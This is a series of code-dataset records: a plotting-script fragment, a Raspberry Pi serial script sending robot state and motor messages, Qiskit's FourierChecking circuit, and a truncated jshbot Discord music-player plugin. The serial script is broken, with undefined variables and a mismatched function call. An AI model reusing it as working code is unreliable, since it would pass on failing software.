plt.legend()\r\nplt.show()\r\n\r\n","repo_name":"Slashformotion-s-Graveyard/ELEC_S4","sub_path":"1_INTRO_PYTHON/grapheur_ordre1_2020.py","file_name":"grapheur_ordre1_2020.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"10368301352","text":"import serial\r\n\r\ndef send_state_message(state_serial_port, state_message_id):\r\n state_message = f\"{state_message_id},{state}\\n\"\r\n state_serial_port.write(message.encode())\r\n\r\ndef send_motor_message(motor_serial_port, motor_message_id, left_direction, right_direction, left_speed, right_speed):\r\n motor_message = f\"{motor_message_id},{left_direction},{right_direction},{left_speed},{right_speed}\\n\"\r\n motor_serial_port.write(message.encode())\r\n\r\ndef receive_ultrasonic_data(): \r\n print(\"hi\")\r\n\r\n\r\n# Serial port configuration\r\nstate_serial_port = serial.Serial('/dev/ttyUSB0', 9600) # Replace '/dev/ttyUSB0' with the appropriate serial port\r\n\r\n# Serial port configuration\r\nmotor_serial_port = serial.Serial('/dev/ttyUSB0', 9600) # Replace '/dev/ttyUSB0' with the appropriate serial port\r\n\r\n\r\n# Example usage\r\nstate_message_id = 1\r\nstate = \"manual\" #manual, autonomous, debug, Estopped\r\n\r\n# Example motor usage\r\nmotor_message_id = 1\r\nleft_direction = \"CCW\" #CCW or CW\r\nright_direction = \"CCW\" #CCW or CW\r\nleft_speed = 500\r\nright_speed = 500\r\n\r\n\r\n\r\n# Send the state message\r\nsend_state_message(state_serial_port, state_message_id, state)\r\n\r\n# Send the motor message\r\nsend_motor_message(motor_serial_port, motor_message_id, left_direction, right_direction, left_speed, right_speed)\r\n\r\n# Close the state serial port\r\nstate_serial_port.close()\r\n\r\n# Close the motor serial port\r\nserial_port.close()\r\n\r\n\r\n","repo_name":"SrMeissel/IGVC_Murphy","sub_path":"Raspberry/SerialCommunication.py","file_name":"SerialCommunication.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"26676109017","text":"from typing import List\n\nimport math\nfrom qiskit.circuit import QuantumCircuit\nfrom qiskit.circuit.exceptions import CircuitError\n\nfrom .generalized_gates.diagonal import Diagonal\n\n\nclass FourierChecking(QuantumCircuit):\n \"\"\"Fourier checking circuit.\n\n The circuit for the Fourier checking algorithm, introduced in [1],\n involves a layer of Hadamards, the function :math:`f`, another layer of\n Hadamards, the function :math:`g`, followed by a final layer of Hadamards.\n The functions :math:`f` and :math:`g` are classical functions realized\n as phase oracles (diagonal operators with {-1, 1} on the diagonal).\n\n The probability of observing the all-zeros string is :math:`p(f,g)`.\n The algorithm solves the promise Fourier checking problem,\n which decides if f is correlated with the Fourier transform\n of g, by testing if :math:`p(f,g) <= 0.01` or :math:`p(f,g) >= 0.05`,\n promised that one or the other of these is true.\n\n The functions :math:`f` and :math:`g` are currently implemented\n from their truth tables but could be represented concisely and\n implemented efficiently for special classes of functions.\n\n Fourier checking is a special case of :math:`k`-fold forrelation [2].\n\n **Reference:**\n\n [1] S. Aaronson, BQP and the Polynomial Hierarchy, 2009 (Section 3.2).\n `arXiv:0910.4698 `_\n\n [2] S. Aaronson, A. Ambainis, Forrelation: a problem that\n optimally separates quantum from classical computing, 2014.\n `arXiv:1411.5729 `_\n \"\"\"\n\n def __init__(self, f: List[int], g: List[int]) -> None:\n \"\"\"Create Fourier checking circuit.\n\n Args:\n f: truth table for f, length 2**n list of {1,-1}.\n g: truth table for g, length 2**n list of {1,-1}.\n\n Raises:\n CircuitError: if the inputs f and g are not valid.\n\n Reference Circuit:\n .. plot::\n\n from qiskit.circuit.library import FourierChecking\n from qiskit.tools.jupyter.library import _generate_circuit_library_visualization\n f = [1, -1, -1, -1]\n g = [1, 1, -1, -1]\n circuit = FourierChecking(f, g)\n _generate_circuit_library_visualization(circuit)\n \"\"\"\n num_qubits = math.log2(len(f))\n\n if len(f) != len(g) or num_qubits == 0 or not num_qubits.is_integer():\n raise CircuitError(\n \"The functions f and g must be given as truth \"\n \"tables, each as a list of 2**n entries of \"\n \"{1, -1}.\"\n )\n\n circuit = QuantumCircuit(num_qubits, name=f\"fc: {f}, {g}\")\n\n circuit.h(circuit.qubits)\n\n circuit.compose(Diagonal(f), inplace=True)\n\n circuit.h(circuit.qubits)\n\n circuit.compose(Diagonal(g), inplace=True)\n\n circuit.h(circuit.qubits)\n\n super().__init__(*circuit.qregs, name=circuit.name)\n self.compose(circuit.to_gate(), qubits=self.qubits, inplace=True)\n","repo_name":"Qiskit/qiskit","sub_path":"qiskit/circuit/library/fourier_checking.py","file_name":"fourier_checking.py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"en","doc_type":"code","stars":4020,"dataset":"github-code","pt":"22"} +{"seq_id":"73991617337","text":"import random\nimport asyncio\nimport time\nimport math\n\nimport yaml\nimport discord\n\nfrom urllib.parse import urlparse\nfrom collections import OrderedDict, deque\nfrom psycopg2.extras import Json\nfrom datetime import datetime\n\nfrom enum import Enum, IntEnum\nfrom youtube_dl import YoutubeDL\nfrom tinytag import TinyTag\n\nfrom jshbot import utilities, configurations, data, plugins, logger\nfrom jshbot.exceptions import ConfiguredBotException, BotException\nfrom jshbot.commands import (\n Command, SubCommand, Shortcut, ArgTypes, Attachment, Arg, Opt, MessageTypes, Response)\n\n__version__ = '0.3.12'\nCBException = ConfiguredBotException('Music playlist')\nuses_configuration = True\n\nTITLE_LIMIT = 50 # Track title character limit in the track explorer\nURL_LIMIT = 140 # Track URL limit to be displayed in the track explorer\nMIRROR_TIMER = 60 # Chat mirror timer in seconds\n\nclass States(IntEnum):\n PLAYING, PAUSED, STOPPED, LOADING = range(4)\n\nclass Modes(IntEnum):\n PLAYLIST, QUEUE = range(2)\n\nclass Control(IntEnum):\n ALL, PARTIAL, DJS = range(3)\n\n\n@plugins.command_spawner\ndef get_commands(bot):\n\n max_threshold = configurations.get(bot, __name__, key='max_threshold')\n max_cutoff = configurations.get(bot, __name__, key='max_cutoff')\n max_user_track_limit = configurations.get(bot, __name__, key='max_user_track_limit')\n max_total_track_limit = configurations.get(bot, __name__, key='max_total_track_limit')\n\n async def check_whitelist(bot, context):\n config = configurations.get(bot, __name__)\n if config['use_whitelist'] and context.guild.id not in config['whitelist']:\n raise CBException(\"This server is not in the music player whitelist.\")\n\n new_commands = []\n\n new_commands.append(Command(\n 'playlist', subcommands=[\n SubCommand(\n Opt('tracks'), doc='View the entire playlist', function=format_tracklist),\n SubCommand(\n Opt('import'),\n Opt('youtube', attached='url', optional=True, quotes_recommended=False),\n Attachment('tracklist file', optional=True),\n doc='Adds the tracks in the attached tracklist file, '\n 'or from the YouTube playlist link. Only DJs can import '\n 'tracks to prevent abuse.',\n function=import_tracklist),\n SubCommand(\n Opt('info'),\n Arg('track number', quotes_recommended=False, convert=int),\n doc='Retrieves the song information of the given track number.',\n function=get_info),\n SubCommand(\n Opt('add'),\n Arg('query', argtype=ArgTypes.MERGED),\n doc='Adds a song to the playlist. Can either be a URL to a supported site '\n '(YouTube, Bandcamp, SoundCloud, etc.) or a YouTube search query',\n function=add_track),\n SubCommand(\n Opt('remove'),\n Arg('track number', quotes_recommended=False, convert=int),\n doc='Removes the given track number from the playlist.',\n function=remove_track),\n SubCommand(\n Opt('volume'),\n Arg('percent', quotes_recommended=False,\n convert=utilities.PercentageConverter(),\n check=lambda b, m, v, *a: 0.01 <= v <= 1.0,\n check_error='Must be between 1% and 100% inclusive.'),\n doc='Sets the player volume to the given percentage.',\n function=set_volume),\n SubCommand(\n Opt('configure'),\n Opt('threshold', attached='seconds', optional=True, group='options',\n quotes_recommended=False, convert=int,\n check=lambda b, m, v, *a: 10 <= v <= max_threshold,\n check_error='Must be between 10 and {} seconds.'.format(max_threshold)),\n Opt('cutoff', attached='seconds', optional=True, group='options',\n quotes_recommended=False, convert=int,\n check=lambda b, m, v, *a: 10 <= v <= max_cutoff,\n check_error='Must be between 10 and {} seconds.'.format(max_cutoff)),\n Opt('usertracks', attached='limit', optional=True, group='options',\n quotes_recommended=False, convert=int,\n check=lambda b, m, v, *a: 0 <= v <= max_user_track_limit,\n check_error='Must be between 0 and {}.'.format(max_user_track_limit),\n doc='Limits the number of tracks users can add to the player. 0 for no limit'),\n Opt('totaltracks', attached='limit', optional=True, group='options',\n quotes_recommended=False, convert=int,\n check=lambda b, m, v, *a: 0 <= v <= max_total_track_limit,\n check_error='Must be between 0 and {}.'.format(max_total_track_limit),\n doc='Limits the total number of tracks for the player. 0 for no limit'),\n Opt('djrole', attached='role', optional=True, group='options',\n convert=utilities.RoleConverter()),\n Opt('channel', attached='text channel', optional=True, group='options',\n quotes_recommended=False,\n convert=utilities.ChannelConverter(constraint=discord.TextChannel),\n doc='Sets the text channel the player will use for the interface.'),\n Opt('switchcontrol', optional=True, group='options',\n doc='Switches between DJ only, partial, and public control types.'),\n Opt('switchmode', optional=True, group='options',\n doc='Switches between repeating playlist and single play queue mode.'),\n Opt('mirrorchat', optional=True, group='options',\n doc='Mirrors the last few chat messages to a message above the player.'),\n Opt('autodisconnect', optional=True, group='options',\n doc='Automatically disconnects the bot if all users leave the channel.'),\n doc='Configures the music player properties.',\n function=configure_player),\n SubCommand(Opt('clear'), doc='Clears the playlist.', function=clear_playlist),\n SubCommand(\n Opt('page'),\n Arg('number', convert=int, quotes_recommended=False),\n doc='Displays the given page.', function=skip_to_page),\n SubCommand(\n Opt('swap'),\n Arg('track 1', convert=int, quotes_recommended=False),\n Arg('track 2', convert=int, quotes_recommended=False),\n doc='Swaps the position of the given tracks.', function=swap_tracks),\n SubCommand(\n Opt('control'),\n Opt('pause', optional=True, group='action'),\n Opt('resume', optional=True, group='action'),\n Opt('stop', optional=True, group='action'),\n Opt('next', optional=True, group='action'),\n Opt('skip', optional=True, group='action'),\n Opt('previous', optional=True, group='action'),\n doc='Basic controls for the player. Only one option can be provided at a time.',\n confidence_threshold=10, function=control_player),\n SubCommand(\n Opt('play'),\n Opt('track', attached='track number', optional=True,\n quotes_recommended=False, convert=int,\n doc='Plays the given track number.'),\n Arg('query', argtype=ArgTypes.MERGED_OPTIONAL,\n doc='Either a URL to a supported site (YouTube, Bandcamp, '\n 'SoundCloud, etc.), or a YouTube search query.'),\n confidence_threshold=5, doc='Plays (or adds) the given track.',\n function=setup_player, id='play'),\n SubCommand(doc='Shows the music player interface.', function=setup_player, id='show'),\n ],\n shortcuts=[\n Shortcut('p', '{arguments}', Arg('arguments', argtype=ArgTypes.MERGED_OPTIONAL)),\n Shortcut('add', 'add {query}', Arg('query', argtype=ArgTypes.MERGED)),\n Shortcut('remove', 'remove {number}', Arg('number', argtype=ArgTypes.MERGED)),\n Shortcut('volume', 'volume {percent}', Arg('percent', argtype=ArgTypes.MERGED)),\n Shortcut(\n 'play', 'play {arguments}',\n Arg('arguments', argtype=ArgTypes.MERGED_OPTIONAL)),\n Shortcut('pause', 'control pause'),\n Shortcut('resume', 'control resume'),\n Shortcut('skip', 'control skip'),\n Shortcut('next', 'control next'),\n Shortcut('previous', 'control previous')],\n allow_direct=False, category='music',\n pre_check=check_whitelist, description='Play music.'))\n\n return new_commands\n\n\n@plugins.db_template_spawner\ndef get_templates(bot):\n return {\n 'playlist_template': (\n \"url text,\"\n \"downloadurl text,\"\n \"title text,\"\n \"duration integer,\"\n \"userid bigint,\"\n \"timestamp bigint,\"\n \"extra json,\"\n \"id serial UNIQUE\"\n )\n }\n\n\nclass MusicPlayer():\n\n def __init__(self, bot, message, autoplay=False, track_index=None):\n\n # Discord information\n self.bot = bot\n self.channel = message.channel\n self.author = message.author\n self.voice_channel = message.author.voice.channel\n self.guild = message.guild\n self.voice_client = None\n self.source = None\n self.embed = None\n self.message = None # Set later\n self.satellite_message = None\n self.satellite_data = None\n self.mirror_message = None\n self.mirror_last_notification = None\n self.mirror_notifications = deque(maxlen=5)\n self.mirror_chats = deque(maxlen=12)\n\n # Update/internal tasks\n self.timer_task = None # Player timer\n self.command_task = None # Waits for reaction commands\n self.progress_task = None # Refreshes the progress bar\n self.state_check_task = None # Checks voice state changes\n self.chat_mirror_task = None # Mirrors chat every 10 seconds\n self.autoplay_task = None # Short-lived task for autostarting the player\n\n # Player information\n self.state = States.LOADING\n self.loading_interface = False\n self.first_time_startup = True\n self.now_playing = None\n self.notification = None\n self.page = 0\n self.progress = 0\n self.start_time = 0\n self.last_interface_update = 0\n self.listeners = 0\n self.skip_voters = []\n self.skip_threshold = 0.5\n self.shuffle_stack = []\n self.autopaused = False\n self.tracklist = None\n self.tracklist_url = ''\n self.tracklist_time = 0\n self.tracklist_update_time = 0\n self.update_tracklist()\n self.update_config()\n\n if self.mode == Modes.QUEUE:\n self.track_index = 0 # Track index in queue mode doesn't change\n else:\n if self.shuffle and self.tracklist:\n self.track_index = random.randint(0, len(self.tracklist) - 1)\n else:\n self.track_index = data.get(\n self.bot, __name__, 'last_index', guild_id=self.guild.id, default=0)\n if not 0 <= self.track_index < len(self.tracklist):\n self.track_index = 0\n\n # Build interface\n asyncio.ensure_future(self._connect(autoplay=autoplay, track_index=track_index))\n\n def update_config(self):\n guild_id = self.guild.id\n default_threshold = configurations.get(self.bot, __name__, key='max_threshold')\n default_cutoff = configurations.get(self.bot, __name__, key='max_cutoff')\n\n self.threshold = data.get(\n self.bot, __name__, 'threshold', guild_id=guild_id, default=default_threshold)\n self.cutoff = data.get(\n self.bot, __name__, 'cutoff', guild_id=guild_id, default=default_cutoff)\n self.control = data.get(\n self.bot, __name__, 'control', guild_id=guild_id, default=Control.PARTIAL)\n self.mode = data.get(\n self.bot, __name__, 'mode', guild_id=guild_id, default=Modes.QUEUE)\n self.shuffle = data.get(\n self.bot, __name__, 'shuffle', guild_id=guild_id, default=Modes.QUEUE)\n self.mirror_chat = data.get(\n self.bot, __name__, 'mirror_chat', guild_id=guild_id, default=False)\n self.auto_disconnect = data.get(\n self.bot, __name__, 'auto_disconnect', guild_id=guild_id, default=False)\n\n self.volume = data.get(self.bot, __name__, 'volume', guild_id=guild_id, default=1.0)\n if self.source:\n self.source.volume = self.volume\n\n # Actively update threshold/cutoff timer\n if self.timer_task and self.state == States.PLAYING:\n self.timer_task.cancel()\n self.timer_task = asyncio.ensure_future(\n self._track_timer(*self._get_delay(config_update=True)))\n\n async def _connect(self, autoplay=False, track_index=None):\n is_mod = data.is_mod(self.bot, member=self.author)\n try:\n self.voice_client = await utilities.join_and_ready(\n self.bot, self.voice_channel, is_mod=is_mod, reconnect=True)\n except Exception as e:\n self.state = States.STOPPED\n error = CBException(\"Failed to start the player interface.\", e=e)\n await self.channel.send(embed=error.embed)\n else:\n await asyncio.sleep(1) # Safety sleep\n await self._build_interface()\n # Start playback if necessary\n if autoplay:\n self.autoplay_task = asyncio.ensure_future(\n self._autoplay(track_index=track_index))\n\n async def _autoplay(self, track_index=None):\n safety_timeout = 0\n while self.state == States.LOADING:\n if safety_timeout > 30:\n raise CBException(\"Autoplay failed.\")\n await asyncio.sleep(0.5)\n safety_timeout += 0.5\n asyncio.ensure_future(self.play(track_index=track_index, author=self.author))\n\n def update_tracklist(self):\n self.tracklist_update_time = time.time()\n self.tracklist = _get_tracklist(self.bot, self.guild)\n\n async def update_state(self):\n if self.state == States.STOPPED:\n return\n if not (self.voice_client and self.voice_channel):\n logger.warn(\"update_state detected that the bot disconnected. Stopping now.\")\n await self.stop(\n text=\"The player has been stopped due to an undetected disconnection.\")\n elif (\n (self.voice_client.is_playing() and self.voice_client.source != self.source) or\n self.guild.me not in self.voice_channel.members):\n logger.warn(\"update_state detected an unstopped instance. Stopping now.\")\n await self.stop(\n text=\"The player has been stopped due to a different audio source being in use.\")\n\n async def reset_player_messages(self):\n \"\"\"Rebuilds the set of 3 messages if one is somehow deleted.\"\"\"\n await self.set_new_message(self.message)\n self.mirror_last_notification = \"\"\n self.notification = \"A message was unexpectedly deleted.\"\n\n async def set_new_message(self, message, autoplay=False, track_index=None):\n \"\"\"Bumps up the player interface to the bottom of the channel.\"\"\"\n\n # Prevent issues with trying to set a new message too quickly\n if self.loading_interface:\n logger.warn(\"Ignoring interface refresh reques as the interface is still loading\")\n if autoplay:\n self.autoplay_task = asyncio.ensure_future(\n self._autoplay(track_index=track_index))\n return\n self.loading_interface = True\n\n if self.command_task:\n self.command_task.cancel()\n if self.progress_task:\n self.progress_task.cancel()\n if self.state_check_task:\n self.state_check_task.cancel()\n if self.chat_mirror_task:\n self.chat_mirror_task.cancel()\n if self.message:\n for old_message in (self.message, self.satellite_message, self.mirror_message):\n try:\n await old_message.delete()\n except Exception as e:\n logger.warn(\"Couldn't delete original messages: %s\", e)\n\n self.channel = message.channel\n self.author = message.author\n self.satellite_data = None # Force update\n asyncio.ensure_future(self._build_interface(resume=self.state == States.PLAYING))\n if autoplay:\n self.autoplay_task = asyncio.ensure_future(\n self._autoplay(track_index=track_index))\n\n async def _build_interface(self, resume=False):\n \"\"\"Sets up player messages and the main interface structure.\"\"\"\n self.state = States.LOADING\n self.loading_interface = True\n self.satellite_message = await self.channel.send(embed=discord.Embed(title=\"\\u200b\"))\n self.mirror_message = await self.channel.send(embed=discord.Embed(title=\"\\u200b\"))\n embed = discord.Embed(colour=discord.Colour(0xffab00))\n embed.add_field( # Title\n name=':arrows_counterclockwise: **[]**',\n value='**`[{}]` [ `0:00` / `0:00` ]**'.format('-' * 50), inline=False)\n embed.add_field(name='---', value='---', inline=False) # Info\n embed.add_field(name='---', value='---', inline=False) # Listeners\n embed.add_field(name='---', value='---\\n' * 6, inline=False) # Tracklist\n embed.add_field(name='---', value='---') # Notification\n self.embed = embed\n self.message = await self.channel.send(embed=embed)\n self.command_task = asyncio.ensure_future(self._command_listener(resume=resume))\n\n async def _progress_loop(self):\n \"\"\"Refreshes the progress bar.\"\"\"\n await asyncio.sleep(5)\n while True:\n await self.update_state()\n if self.state == States.PLAYING:\n self.update_listeners(update_interface=False)\n if time.time() - self.last_interface_update >= 4:\n asyncio.ensure_future(self.update_interface())\n asyncio.ensure_future(self.update_satellite())\n await asyncio.sleep(5)\n elif self.state in (States.PAUSED, States.LOADING):\n # TODO: Implement idle timeout\n await asyncio.sleep(1)\n else: # Stopped\n logger.warn(\"Progress loop wasn't cancelled for some reason. Stopping loop...\")\n return\n\n async def _chat_mirror_loop(self):\n \"\"\"Mirrors chat messages after 10 seconds.\"\"\"\n\n async def _delete_and_update(message):\n await asyncio.sleep(MIRROR_TIMER)\n if self.state == States.STOPPED or not self.mirror_chat:\n return\n try:\n await message.delete()\n except Exception as e:\n pass\n else:\n await self.update_mirror(new_chat=message)\n\n while True:\n message = await self.bot.wait_for('message')\n if (not self.mirror_chat or\n not message or\n self.state == States.STOPPED or\n message.channel != self.channel):\n continue\n\n # Don't log player messages by the bot or non-standard messages (like pins)\n player_messages = (self.message.id, self.satellite_message.id, self.mirror_message.id)\n if message.type is discord.MessageType.default and message.id not in player_messages:\n asyncio.ensure_future(_delete_and_update(message))\n\n async def _listener_loop(self):\n \"\"\"Checks the state of members in the voice channel.\"\"\"\n\n class VoiceChange(Enum):\n NORMAL, LEFT, JOINED = range(3)\n\n def check(member, before, after):\n if member.guild != self.guild:\n return VoiceChange.NORMAL\n elif not member == self.bot.user and (member.bot or not (before or after)):\n return VoiceChange.NORMAL\n elif after and after.channel == self.voice_channel:\n if not before or before.channel != self.voice_channel:\n return VoiceChange.JOINED\n elif before and before.channel == self.voice_channel:\n if not after or after.channel != self.voice_channel:\n return VoiceChange.LEFT\n return VoiceChange.NORMAL\n\n # Preliminary check\n self.listeners = len([it for it in self.voice_channel.members if not it.bot])\n\n # Wait on voice state updates to determine users entering/leaving\n while True:\n result = await self.bot.wait_for('voice_state_update')\n if not result:\n continue\n elif self.state == States.STOPPED:\n return\n member, before, after = result\n\n # Check for self changes\n if member == self.bot.user and member.guild == self.guild:\n if not after: # Disconnected\n # TODO: Consider adding failsafe stop\n logger.warn(\"Voice disconnected, detected from _listener_loop.\")\n return\n if before != after:\n logger.debug(\"Bot was dragged to a new voice channel.\")\n if after.channel == self.guild.afk_channel: # TODO: Act on AFK channel\n logger.warn(\"Moved to the AFK channel. Failsafe stopping.\")\n self.voice_channel = after.channel\n self.voice_client = self.guild.voice_client\n\n # Update listener count\n self.listeners = len([it for it in self.voice_channel.members if not it.bot])\n logger.debug(\"Voice state updated. Listeners: %s\", self.listeners)\n self.update_listeners(update_interface=False)\n\n voice_change = check(*result)\n if voice_change is VoiceChange.LEFT:\n if member.id in self.skip_voters:\n self.skip_voters.remove(member.id)\n asyncio.ensure_future(self.update_interface(ignore_ratelimit=True))\n elif voice_change is VoiceChange.JOINED:\n asyncio.ensure_future(self.update_interface(ignore_ratelimit=True))\n\n if self.listeners == 0:\n if self.auto_disconnect:\n asyncio.ensure_future(\n self.stop(\n text=(\n \"The player has been stopped due to all users leaving the channel.\"\n )\n )\n )\n else:\n self.autopaused = True\n self.notification = \"The player has been automatically paused\"\n asyncio.ensure_future(self.pause())\n\n def update_listeners(self, update_interface=True):\n \"\"\"Updates the number of listeners and skips the song if enough people have voted.\"\"\"\n\n current_listeners = [it.id for it in self.voice_channel.members]\n for member_id in self.skip_voters[:]:\n if member_id not in current_listeners:\n self.skip_voters.remove(member_id)\n\n # Skip if enough votes\n needed_votes = math.ceil(self.listeners * self.skip_threshold)\n if needed_votes and len(self.skip_voters) >= needed_votes:\n index_string = '[[Track{}]{}]'.format(\n ' {}'.format(self.track_index + 1) if self.mode == Modes.PLAYLIST else '',\n _build_shortlink(self.bot, self.now_playing))\n self.notification = \"{} was voteskipped ({} vote{})\".format(\n index_string, len(self.skip_voters), '' if len(self.skip_voters) == 1 else 's')\n del self.skip_voters[:]\n self._skip_track()\n elif update_interface:\n asyncio.ensure_future(self.update_interface(ignore_ratelimit=True))\n\n async def update_interface(self, notification_text='', ignore_ratelimit=False):\n \"\"\"Calls the other functions to update the main interface.\"\"\"\n await self.update_notification(text=notification_text)\n await self.update_title()\n await self.update_info()\n await self.update_footer()\n if not ignore_ratelimit and time.time() - self.last_interface_update < 1:\n return\n try:\n await self.message.edit(content=None, embed=self.embed)\n self.last_interface_update = time.time()\n except discord.NotFound:\n await self.reset_player_messages()\n\n async def update_satellite(self):\n \"\"\"Updates the satellite with track data.\"\"\"\n\n if not self.now_playing and self.satellite_data: # Player stopped\n self.satellite_data = None\n await self.satellite_message.edit(embed=discord.Embed())\n return\n elif not self.now_playing or self.now_playing.extra == self.satellite_data:\n return\n self.satellite_data = extra = self.now_playing.extra\n\n embed = discord.Embed()\n keys = ('uploader', 'views', 'likes', 'dislikes', 'uploaded')\n if any(key in extra for key in keys):\n info_list = ['{}: {}'.format(key.title(), extra[key]) for key in keys if key in extra]\n embed.add_field(name='Info', value='\\n'.join(info_list))\n\n if 'description' in extra:\n description = extra['description']\n chunks = [description[it:it + 1000] for it in range(0, len(description), 1000)]\n if len(chunks) > 3:\n chunks = chunks[:3]\n chunks[-1] += '…'\n for index, chunk in enumerate(chunks):\n embed.add_field(name='Description' if index == 0 else '\\u200b', value=chunk)\n\n if 'thumbnail' in extra:\n embed.set_image(url=extra['thumbnail'])\n\n if 'artist_thumbnail' in extra:\n embed.set_thumbnail(url=extra['artist_thumbnail'])\n\n try:\n await self.satellite_message.edit(embed=embed)\n except discord.NotFound:\n await self.reset_player_messages()\n\n async def update_mirror(self, new_notification=None, new_chat=None):\n \"\"\"Updates the mirror message with notification or chat data.\"\"\"\n\n if new_notification:\n if new_notification != self.mirror_last_notification:\n self.mirror_last_notification = new_notification\n self.mirror_notifications.append(new_notification)\n if new_chat:\n self.mirror_chats.append(new_chat)\n\n embed = discord.Embed()\n while sum(len(it) for it in self.mirror_notifications) > 1000:\n self.mirror_notifications.popleft()\n notifications = '\\u200b' + '\\n'.join(self.mirror_notifications)\n embed.add_field(name='Recent notifications:', value=notifications, inline=False)\n\n if self.mirror_chat:\n\n for _ in range(3):\n embed.add_field(name='\\u200b', value='\\u200b', inline=False)\n formatted_chats = []\n\n def _length_check(segment_index):\n \"\"\"Checks the length of a set of 4 messages given the segment.\"\"\"\n segment = formatted_chats[4 * segment_index:4 * segment_index + 4]\n return sum(len(it) for it in segment) < 1000\n\n # Format messages\n for message in self.mirror_chats:\n if message.attachments:\n attachment = ' [(Attachment)]({})'.format(message.attachments[0].url)\n else:\n attachment = ''\n if message.content:\n content = message.content\n elif message.embeds:\n title, description = message.embeds[0].title, message.embeds[0].description\n title_text = '{}: '.format(title) if title else ''\n description_text = description if description else '[No description]'\n content = '{}{}'.format(title_text, description_text)\n else:\n content = '[Empty message]'\n if len(content) > 500:\n content = content[:500] + '…'\n content = content.replace('```', '\\`\\`\\`')\n formatted_chats.append('[{}{}]: {}'.format(\n message.author.mention, attachment, content))\n\n # Remove messages if one is too long\n for it in range(2, -1, -1):\n while not _length_check(it):\n del formatted_chats[0]\n\n # Set embeds\n segments = [formatted_chats[it:it + 4] for it in range(0, 12, 4)]\n for index, segment in enumerate(segments):\n embed.set_field_at(\n index + 1, name='Recent chat messages:' if index == 0 else '\\u200b',\n value='\\u200b' + '\\n'.join(segment), inline=False)\n\n try:\n await self.mirror_message.edit(embed=embed)\n except discord.NotFound:\n await self.reset_player_messages()\n\n async def update_footer(self):\n \"\"\"Updates volume display, control type, and player mode in the footer.\"\"\"\n if self.volume < 0.3:\n volume_indicator = '\\U0001F508'\n elif self.volume < 0.6:\n volume_indicator = '\\U0001F509'\n else:\n volume_indicator = '\\U0001F50A'\n footer_text = '{}: {}% | {} | {}{}{} | Click \\u2753 for help'.format(\n volume_indicator,\n int(self.volume * 100),\n ('Public', 'Partially public', 'DJs only')[self.control],\n '\\U0001F500 ' if self.mode == Modes.PLAYLIST and self.shuffle else '',\n ('Playlist', 'Queue')[self.mode],\n ' | Mirroring chat' if self.mirror_chat else '')\n self.embed.set_footer(text=footer_text)\n\n async def update_title(self):\n \"\"\"Updates the now playing title and progress bar\"\"\"\n # Calculate progress and set embed color\n if self.state == States.PLAYING:\n progress = self.progress + (time.time() - self.start_time)\n status_icon = ':arrow_forward:'\n color = discord.Color(0x3b88c3)\n elif self.state == States.PAUSED:\n progress = self.progress\n status_icon = ':pause_button:'\n color = discord.Color(0xccd6dd)\n else:\n progress = 0\n status_icon = ':arrows_counterclockwise:'\n color = discord.Color(0xffab00)\n self.embed.color = color\n\n # Set title and progress\n if self.now_playing:\n title = _truncate_title(self.now_playing.title, limit=60)\n duration = self.now_playing.duration\n else:\n title = '---'\n duration = 0\n new_name = '{} **[{}]**'.format(status_icon, title)\n percentage = 0 if duration == 0 else progress / duration\n progress_bar = '\\u2588' * int(50 * percentage)\n new_value = '**`[{:-<50}]` [ `{}` / `{}` ]**'.format(\n progress_bar, utilities.get_time_string(progress),\n utilities.get_time_string(duration))\n\n self.embed.set_field_at(0, name=new_name, value=new_value, inline=False)\n\n async def update_info(self):\n \"\"\"Updates the info, listeners, and track list explorer display.\"\"\"\n # Listeners\n new_name = '{} listener{}'.format(self.listeners, '' if self.listeners == 1 else 's')\n new_value = '[ {} / {} ] :eject: votes needed to skip'.format(\n len(self.skip_voters), math.ceil(self.listeners * self.skip_threshold))\n self.embed.set_field_at(2, name=new_name, value=new_value, inline=False)\n\n # Tracklist slice\n total_tracks = len(self.tracklist)\n total_duration = sum(it.duration for it in self.tracklist)\n total_pages = max(int((total_tracks + 4) / 5), 1)\n self.page %= total_pages\n displayed_tracks = self.tracklist[self.page * 5:(self.page * 5) + 5]\n\n # Build individual track entries from slice\n info = ['---'] * 5 + ['Page [ {} / {} ]'.format(self.page + 1, total_pages)]\n for index, entry in enumerate(displayed_tracks):\n duration = utilities.get_time_string(entry.duration)\n entry_index = (self.page * 5) + index + 1\n full_title = entry.title.replace('`', '').replace('*', '')\n title = _truncate_title(full_title)\n use_indicator = entry_index == self.track_index + 1 and self.mode == Modes.PLAYLIST\n info[index] = ('**[`{}{}`]{}**: ({}) *{}*'.format(\n '▶ ' if use_indicator else '', entry_index,\n _build_shortlink(self.bot, entry), duration, title))\n new_value = '\\n'.join(info)\n\n # Total tracks and runtime\n player_mode = 'queued' if self.mode == Modes.QUEUE else 'in the playlist'\n if total_tracks > 0:\n new_name = '{} track{} {} (runtime of {}):'.format(\n total_tracks, '' if total_tracks == 1 else 's', player_mode,\n utilities.get_time_string(total_duration, text=True))\n else:\n new_name = 'No tracks {}'.format(player_mode)\n\n self.embed.set_field_at(3, name=new_name, value=new_value, inline=False)\n\n # Info\n if self.now_playing:\n new_name = 'Info:'\n time_ago = time.time() - self.now_playing.timestamp\n index_string = '[[Track{}]{}]'.format(\n ' {}'.format(self.track_index + 1) if self.mode == Modes.PLAYLIST else '',\n _build_shortlink(self.bot, self.now_playing))\n new_value = 'Playing: {} Added by <@{}> {} ago'.format(\n index_string, self.now_playing.userid,\n utilities.get_time_string(time_ago, text=True))\n else:\n new_name = '---'\n new_value = '---'\n\n # Determine next track\n if len(self.tracklist) == 0:\n next_index = -1\n new_value += '\\n---'\n elif self.now_playing is None:\n next_index = 0 if self.mode == Modes.QUEUE else self.track_index\n elif self.track_index + 1 >= len(self.tracklist):\n next_index = 0\n else:\n if self.mode == Modes.PLAYLIST:\n next_index = self.track_index + 1\n else:\n next_index = 0\n\n # Show next track if available\n if next_index != -1:\n next_track = self.tracklist[next_index]\n if next_index >= 0:\n if self.mode == Modes.PLAYLIST and self.shuffle:\n new_value += '\\nUp next: [Track ?]'\n else:\n new_value += '\\nUp next: {}'.format(\n _build_track_details(self.bot, next_track, next_index))\n\n self.embed.set_field_at(1, name=new_name, value=new_value, inline=False)\n\n async def update_notification(self, text=''):\n if text:\n self.notification = text\n elif not self.notification:\n self.notification = 'No notification.'\n if self.notification != self.mirror_last_notification:\n 